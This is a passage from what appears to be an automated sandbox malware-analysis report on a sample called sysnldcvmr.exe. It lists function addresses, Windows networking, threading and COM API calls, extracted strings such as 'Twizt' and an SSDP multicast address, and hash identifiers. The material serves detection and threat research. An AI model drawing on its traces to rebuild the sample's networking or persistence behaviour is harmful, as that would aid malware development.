                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$CountTickrandsrand
                                                                    • String ID:
                                                                    • API String ID: 3488799664-0
                                                                    • Opcode ID: 1503d547a84aa88fbee23e8cbfc899b47ed0880758e93169a3ac49148c4a2f4a
                                                                    • Instruction ID: b6b36855a0edcd25512206b50fb5473dda965f97846ebbbd8b428d1493e324f4
                                                                    • Opcode Fuzzy Hash: 1503d547a84aa88fbee23e8cbfc899b47ed0880758e93169a3ac49148c4a2f4a
                                                                    • Instruction Fuzzy Hash: 1D21D875E04208FBD704DF60D8856AE7B31EB45304F10C47AED026B381DA79AA80DB56
                                                                    Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                    • htons.WS2_32(?), ref: 00401281
                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                    • String ID: pdu
                                                                    • API String ID: 2164660128-2320407122
                                                                    • Opcode ID: 5b264580e174f85d4cce86815f8b38fbca65b529ae4d3d4b8a529887849fd544
                                                                    • Instruction ID: d4e165de5104959f260b85937ca272364f863e3dc64df769d8e1baf9f078371f
                                                                    • Opcode Fuzzy Hash: 5b264580e174f85d4cce86815f8b38fbca65b529ae4d3d4b8a529887849fd544
                                                                    • Instruction Fuzzy Hash: 5831A5762083009BC710DF69D884A9BBBE4AFC9714F04456EFD9897381D634D919C7E7
                                                                    Function 00406FE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 22memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,00407A2A), ref: 00406FE8
                                                                    • SysAllocString.OLEAUT32(C:\Windows\sysnldcvmr.exe), ref: 00406FF3
                                                                    • CoUninitialize.OLE32 ref: 00407018
                                                                      • Part of subcall function 00407030: SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407012
                                                                    Strings
                                                                    • C:\Windows\sysnldcvmr.exe, xrefs: 00406FEE
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                    • String ID: C:\Windows\sysnldcvmr.exe
                                                                    • API String ID: 459949847-3906355863
                                                                    • Opcode ID: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                    • Instruction ID: 74c6c169e6652ce6f6b7715e91ddbb7e77275cafe0f94b55a583b47f3cb3299b
                                                                    • Opcode Fuzzy Hash: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                    • Instruction Fuzzy Hash: 13E01275D44208FBD704AFA0DD0EB9D77789B05341F1081A5F905922A0DAF95E80DB56
                                                                    Function 00406320 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                    • QueryDosDeviceW.KERNEL32(004062FF,?,00000208), ref: 0040636C
                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406384
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: DeviceDriveQueryType
                                                                    • String ID: \??\
                                                                    • API String ID: 1681518211-3047946824
                                                                    • Opcode ID: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                    • Instruction ID: affcc5b958b6168f9f245bae438771e9e0bc574488939cd978d138ae5b874539
                                                                    • Opcode Fuzzy Hash: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                    • Instruction Fuzzy Hash: 4101ECB0A4020CEBCB20DF55DD496DEB7B5AB04704F01C0BAAA09A7280D6759AD5CF99
                                                                    Function 00407310 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.NTDLL(00000000,?,?), ref: 00407338
                                                                    • CreateThread.KERNEL32(00000000,00000000,00407370,00000000,00000000,00000000), ref: 0040735A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00407361
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleThreadmemcpy
                                                                    • String ID: .Mw
                                                                    • API String ID: 2064604595-2453323595
                                                                    • Opcode ID: 4ba0acdde54fd6a1846075b770b5d55397f96483b8af1252066fbfcfee1e69d0
                                                                    • Instruction ID: f93afe995e2a8aed0921a04be4342d20ba97acab7f8849ac526c8a5d2aa2879c
                                                                    • Opcode Fuzzy Hash: 4ba0acdde54fd6a1846075b770b5d55397f96483b8af1252066fbfcfee1e69d0
                                                                    • Instruction Fuzzy Hash: 20F090B1A04308FBDB00DFA4EC46F9E7378BB48704F244468F908A73C1D675AA10CB59
                                                                    Function 0040E770 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleSize
                                                                    • String ID: .Mw
                                                                    • API String ID: 1378416451-2453323595
                                                                    • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                    • Instruction ID: 089911091b4f8663884f4f3f40455582f6b765449e30803f2281244f10637e16
                                                                    • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                    • Instruction Fuzzy Hash: FDF0C074A40308FBEB20DFA4DC49FDDBB78EB04711F208695FA05BB2D0D6B56A918B54
                                                                    Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                    • String ID:
                                                                    • API String ID: 3980219359-0
                                                                    • Opcode ID: c9913038924388fd53f7caad2d83427ef97aeb746a7412440f965ee31c5f62a1
                                                                    • Instruction ID: e1641215121ef27e00d374ead4771de002ae7678dd3977a0c2b5eb1dd4af8410
                                                                    • Opcode Fuzzy Hash: c9913038924388fd53f7caad2d83427ef97aeb746a7412440f965ee31c5f62a1
                                                                    • Instruction Fuzzy Hash: BE21B1B11043016FD304DF65D884A6BB7E8AF88318F004A3EF559A6291E774D948C7AA
                                                                    Function 00407030 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004072C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFreeInstanceString
                                                                    • String ID: Microsoft Corporation
                                                                    • API String ID: 586785272-3838278685
                                                                    • Opcode ID: 02533b8cefa12045522b44547180ad822de7a0bc47ea34b05886565fcfb19160
                                                                    • Instruction ID: 457fc6c08a50d419230b37d5b6ce52bdab008108e04107557a49afcd29d8ec7c
                                                                    • Opcode Fuzzy Hash: 02533b8cefa12045522b44547180ad822de7a0bc47ea34b05886565fcfb19160
                                                                    • Instruction Fuzzy Hash: 4491FC75E0410ADFCB04DB94D890AAFB7B5BF48304F2081A9E515B73E4D734AE82CB66
                                                                    Function 0040D640 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitializeEx.COMBASE(00000000,00000002,?,?,?,00407A25), ref: 0040D64A
                                                                      • Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                      • Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
                                                                      • Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                      • Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                      • Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                      • Part of subcall function 0040D710: lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                      • Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                      • Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                    • String ID: TCP$UDP
                                                                    • API String ID: 1519345861-1097902612
                                                                    • Opcode ID: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                    • Instruction ID: b9d850b43d5b9198a526a111fa4c70c7537d99c61ef063864e94ee7d89292dcb
                                                                    • Opcode Fuzzy Hash: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                    • Instruction Fuzzy Hash: A91181B4D01208EBDB00EBD4D945FEE7374AB44308F1089BAE505772C2D7799E58CB9A
                                                                    Function 00405EB0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00415E30,?,00000000,?), ref: 00405EBF
                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405EFE
                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F73
                                                                    • LeaveCriticalSection.KERNEL32(00415E30), ref: 00405F90
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSectionmemcpy$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 469056452-0
                                                                    • Opcode ID: 2c26dda0fb1b2b55389890a8dd4c5e3531891c631ddff193af464d92092119d3
                                                                    • Instruction ID: 4abcbf5e8f17672ba879e37304839ab4c0f114d9c1813139277d8bca2654c775
                                                                    • Opcode Fuzzy Hash: 2c26dda0fb1b2b55389890a8dd4c5e3531891c631ddff193af464d92092119d3
                                                                    • Instruction Fuzzy Hash: 71217C35D04609EBCB04DF94D985BDEBBB1EB48304F1481AAE80567281D37CAA95CF9A
                                                                    Function 0040CAD0 Relevance: 4.6, APIs: 3, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CADC
                                                                    • InterlockedIncrement.KERNEL32(000000FF), ref: 0040CB11
                                                                    • InterlockedDecrement.KERNEL32(000000FF), ref: 0040CC14
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$DecrementExchangeIncrement
                                                                    • String ID:
                                                                    • API String ID: 2813130747-0
                                                                    • Opcode ID: 583b2f640be86316a3766e4c7421dc12573213a2e397918099c48a18d3c3b376
                                                                    • Instruction ID: 83670a342839083162ad58e3b7d5d9bbd8ac0fe46ad26882e5e5984df89c7db9
                                                                    • Opcode Fuzzy Hash: 583b2f640be86316a3766e4c7421dc12573213a2e397918099c48a18d3c3b376
                                                                    • Instruction Fuzzy Hash: EB41C5B5E00204FBDF00EB94E885BAF77755B04304F148669F505BB2C2D639E94187A9
                                                                    Function 0040B480 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(Twizt,0040D5B8,0040D5B8,?,?,0040D5B8,00000000,0040D5B8,0040D5B8,00000000,00000000), ref: 0040B4CC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: Twizt$Twizt
                                                                    • API String ID: 1659193697-16428492
                                                                    • Opcode ID: 28cc8b85fbb863a96b5461235214a5ab15b9d829432cc0cf808d74acbef9bc59
                                                                    • Instruction ID: a71c0bccabe8f3fb080a23dd90b4eb14de59e01fcd2b7b8bcad4b0800539831b
                                                                    • Opcode Fuzzy Hash: 28cc8b85fbb863a96b5461235214a5ab15b9d829432cc0cf808d74acbef9bc59
                                                                    • Instruction Fuzzy Hash: 181124B5900108BFCB04DF98D841E9EB7B5EF48308F14C1A9FD19AB342D635EA10CBA5
                                                                    Function 0040CDC0 Relevance: 4.5, APIs: 3, Instructions: 45networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 0040CDD3
                                                                    • htons.WS2_32(00009E34), ref: 0040CE05
                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040CE1F
                                                                      • Part of subcall function 0040AB40: shutdown.WS2_32(0040AB2D,00000002), ref: 0040AB49
                                                                      • Part of subcall function 0040AB40: closesocket.WS2_32(0040AB2D), ref: 0040AB53
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: closesocketconnecthtonsshutdownsocket
                                                                    • String ID:
                                                                    • API String ID: 1987800339-0
                                                                    • Opcode ID: cbdb9185097dfb3a9a33e6ecced3d904d4b18b7e3af7f03057a5aabe6a457024
                                                                    • Instruction ID: 10e4ce005d5f4377fb43720ce7fadd865a0fdbaf8ef4bbe44a4c7335c1314f5f
                                                                    • Opcode Fuzzy Hash: cbdb9185097dfb3a9a33e6ecced3d904d4b18b7e3af7f03057a5aabe6a457024
                                                                    • Instruction Fuzzy Hash: 71113974D05209EBCB10DFA8DA496AEB670AF08320F2043A9E529A73D0D7745F01979A
                                                                    Function 00409E70 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53
                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00409DC7,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E9C
                                                                    • HeapSetInformation.KERNEL32(020D0000,00000000,00000002,00000004), ref: 00409EC6
                                                                    • GetCurrentProcessId.KERNEL32 ref: 00409ECC
                                                                      • Part of subcall function 00409EE0: GetProcessHeaps.KERNEL32(000000FF,?), ref: 00409EFC
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentHeap$CreateHeapsInformation
                                                                    • String ID:
                                                                    • API String ID: 3179415709-0
                                                                    • Opcode ID: f2378abd389c528855b2215640a50ba70f6bde38e81fbf66e01ddb41fd263172
                                                                    • Instruction ID: d15e15a0956cd53a3f7420caceedbd75f27766a05eec27fee61015ba2f128238
                                                                    • Opcode Fuzzy Hash: f2378abd389c528855b2215640a50ba70f6bde38e81fbf66e01ddb41fd263172
                                                                    • Instruction Fuzzy Hash: D1F0B4B0581304ABD724DB71FC05BA637A8A704705F02803EF6089A2D2EAB9DC44CB9C
                                                                    Function 00409DB0 Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53
                                                                    • RtlAllocateHeap.NTDLL(020D0000,?,-0000000C), ref: 00409DFA
                                                                    • memset.NTDLL ref: 00409E34
                                                                      • Part of subcall function 00409E70: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00409DC7,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E9C
                                                                      • Part of subcall function 00409E70: HeapSetInformation.KERNEL32(020D0000,00000000,00000002,00000004), ref: 00409EC6
                                                                      • Part of subcall function 00409E70: GetCurrentProcessId.KERNEL32 ref: 00409ECC
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
                                                                    • String ID:
                                                                    • API String ID: 3494217179-0
                                                                    • Opcode ID: d8037d4416afb632a3dc4f98f72e54e87fb15f54c14e696db28e718d2a8b7ec8
                                                                    • Instruction ID: bc348cf5c9b079020b3d900c37522172a8fbba108f4db171397f18f444666f8c
                                                                    • Opcode Fuzzy Hash: d8037d4416afb632a3dc4f98f72e54e87fb15f54c14e696db28e718d2a8b7ec8
                                                                    • Instruction Fuzzy Hash: A611FEB5900108BBCB10EFA5D845B9E7BB5AF44305F14C169F909BB382D638DE54CB99
                                                                    Function 0040D550 Relevance: 3.0, APIs: 2, Instructions: 49synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                      • Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                      • Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429
                                                                      • Part of subcall function 0040B200: EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
                                                                      • Part of subcall function 0040B200: LeaveCriticalSection.KERNEL32(00416690), ref: 0040B23C
                                                                    • InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040D57D
                                                                    • WaitForSingleObject.KERNEL32(00000610,00001388), ref: 0040D5C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
                                                                    • String ID:
                                                                    • API String ID: 3920643007-0
                                                                    • Opcode ID: a86012ae710333058172dcdbedf12253eac4732d168f1a6e5cd698471d501b85
                                                                    • Instruction ID: ebe6697be7004dc57312df383308c6bc29ac17b58d9e4cbca4aa496e4513f42a
                                                                    • Opcode Fuzzy Hash: a86012ae710333058172dcdbedf12253eac4732d168f1a6e5cd698471d501b85
